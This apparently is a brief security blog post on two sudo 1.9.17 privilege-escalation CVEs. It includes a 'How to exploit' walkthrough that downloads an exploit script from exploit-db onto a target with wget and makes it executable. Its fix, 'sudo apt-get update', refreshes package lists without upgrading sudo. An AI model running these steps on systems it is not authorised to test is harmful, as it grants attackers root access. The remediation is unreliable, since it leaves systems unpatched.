sudo 1.9.17 exploit - Privilege Escalation
Two different privilege escalation exploits have been found for sudo version 1.9.17. The associated CVE's for these exploits are
CVE-2025-32462
CVE-2025-32463What happened
On 06/30/2025 the NVD published CVE-2025-32462 which describes how an attacker can abuse sudo to execute commands on unintended machines.
On 06/30/2025 the NVD published CVE-2025-32463 which describes how an attacker can abuse chroot to obtain root privileges.
Both of these exploits were rated at a high severity. On 07/08/2025 the user Rich Mirch disclosed 2 different exploits for this sudo version. They can be located below.
Rich Mirch
Stratascale
How to exploit
- Download the exploit code to the vulnerable target.
wget https://www.exploit-db.com/raw/52354 - Change the name and give the exploit proper privileges.
mv 52354 exploit.sh && chmod +x exploit.sh- Exploit the payload.
Why these exploits are a big deal
This exploit is extremely easy to use and allows an attacker to go from a low-privilege user to the root user on a system. Effectively giving the attacker complete control over the system. Ensuring that your systems running outdated sudo versions are updated is very important.
You can check you sudo version by running the following command.
sudo --versionHow to remediate
Remediation is very straightforward running a regular update to the system will patch the outdated version.
# For debian based systems
sudo apt-get updateFor most systems administrators this should be done on a routine basis based on the systems use case and your patch management policy.
Resources
Rich Mirch
Stratascale
